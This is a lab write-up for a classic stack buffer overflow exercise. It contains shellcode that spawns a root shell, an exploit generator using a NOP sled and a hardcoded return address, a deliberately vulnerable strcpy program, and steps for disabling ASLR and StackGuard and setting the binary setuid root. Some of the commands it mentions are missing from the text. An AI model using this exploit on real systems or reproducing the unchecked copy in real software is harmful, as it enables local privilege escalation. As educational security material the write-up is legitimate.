It is said that there is an experimental guide for "Buffer Overflow Vulnerability Experiment" on the website of the laboratory building, which is free and can be seen at a glance.
The seed virtual machine and program source code are as follows:
exploit1.c:
/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xdb"
"\x89\xd8"
"\xb0\x17"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x17"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x2e"
"\xcd\x80"
"\x31\xc0"
"\x50"
"\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x31\xd2"
"\xb0\x0b"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x01"
"\xcd\x80"
;
/*
char shellcode[]=
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;
*/
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
unsigned long ret=0xbffff3c0;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);/* You need to fill the buffer with appropriate contents here */
memcpy(buffer+16,(char *)&ret,4);
memcpy(buffer+400,shellcode,strlen(shellcode));
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
stack.c:
/* stack_new.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>int bof(char *str)
{
char buffer[12];/* The following statement has a buffer overflow problem */
strcpy(buffer, str);return 1;
}int main(int argc, char **argv)
{
char str[517];
FILE *badfile;badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);printf("Returned Properly\n");
return 1;
}
whiledo.sh:
#!/bin/sh
count=1
while echo $count
do ./stack;
count=$[count+1];
done
After entering the seed system, use the sudo su command to escalate privileges.
Ubuntu and some other Linux systems use Address Space Randomization (ASLR) to randomly change the starting address of the stack. This would make it very difficult to guess the exact address, which is a crucial step in a buffer overflow attack. In this experiment, we turn off ASLR with the following command:
Another: GCC compiler implements a "Stack Guard" security mechanism to prevent buffer overflow. You can turn off this protection when you compile with -fno-stack-protector. For example, to compile a program called example.c without using Stack Guard, you should use the following command: gcc -fno-stack-protector example.c
Compile the stack.c program with GCC without the Stack Guard mechanism and escalate privileges:
Here is an explanation of the meaning of the "chmod 4755 stack" command:
The difference between chmod 4755 and chmod 755 is that there is an extra digit at the beginning. This 4 means that other users have the same permissions as the owner when executing the file.
For example, the root user creates an online authentication program netlogin. If other users want to use this program to access the Internet, the root user needs to run the chmod 755 netlogin command to enable other users to run netlogin.
However, when executing netlogin, it may be necessary to access some files that only the root user has access to, so other users may not be able to access the Internet due to insufficient permissions when executing netlogin.
In this case, you can use chmod 4755 netlogin to set other users to have root user permissions when executing netlogin, so as to surf the Internet smoothly.
Note that after the above operations are completed, to switch to a normal user, type in the terminal: exit
The above program has a buffer overflow vulnerability. It initially reads an input from a file called "badfile" and then passes this input to a buffer in another bof() function. The original input has a maximum length of 517 bytes, whereas the length of bof() is only 12 bytes. A buffer overflow will occur because strcpy() does not check bounds. Since this program is effectively executed as root, if an ordinary user exploits this buffer overflow vulnerability, he may gain a root shell. It should be noted that this program takes input from a file called "badfile", which is under user control. Now our goal is to create content for "badfile" so that when the vulnerable program copies this content into its buffer, a shell is spawned.
Compile the exploit, and perform the following operations, and find that the root shell has been successfully obtained:
Using the command id detection, the attack is successful:
